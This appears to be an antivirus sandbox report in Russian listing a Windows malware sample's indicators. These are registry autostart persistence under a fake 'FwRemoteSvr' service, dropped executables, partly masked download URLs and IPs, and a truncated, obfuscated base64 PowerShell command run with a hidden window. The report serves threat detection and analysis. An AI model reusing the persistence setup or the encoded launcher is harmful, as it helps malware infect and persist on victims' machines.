Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\FwRemoteSvr] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\FwRemoteSvr] 'ImagePath' = '"%WINDIR%\SysWOW64\wscproxystub\FwRemoteSvr.exe"'
- 'FwRemoteSvr' "%WINDIR%\SysWOW64\wscproxystub\FwRemoteSvr.exe"
- 'FwRemoteSvr' %WINDIR%\SysWOW64\wscproxystub\FwRemoteSvr.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AdgBBAHIASQBBAEIATABlACAAKAAiAGsANgAiACsAIgAxAHYATgAiACkAIAAgACgAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAGYAIAAnAC4AaQBvAC4AJwAsACcARA...
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe
- %WINDIR%\syswow64\wscproxystub\fwremotesvr.exe
- %HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe в %WINDIR%\syswow64\wscproxystub\fwremotesvr.exe
- '20#.#9.6.174':80
- http://pl###tjogja.com/wp-content/X/
- http://vn####elopers.com/wp-admin/BF/
- http://20#.#9.6.174/QaC4mk/lCIxA1LyL0X/AiyZd6Zc4LDYSZz/
- DNS ASK pl###tjogja.com
- DNS ASK vn####elopers.com
- '%HOMEPATH%\ozl8bkc\begypjh\sayp9xhut.exe'
- '%WINDIR%\syswow64\wscproxystub\fwremotesvr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AdgBBAHIASQBBAEIATABlACAAKAAiAGsANgAiACsAIgAxAHYATgAiACkAIAAgACgAWwBUAHkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACIAIAAtAGYAIAAnAC4AaQBvAC4AJwAsACcARA...' (со скрытым окном)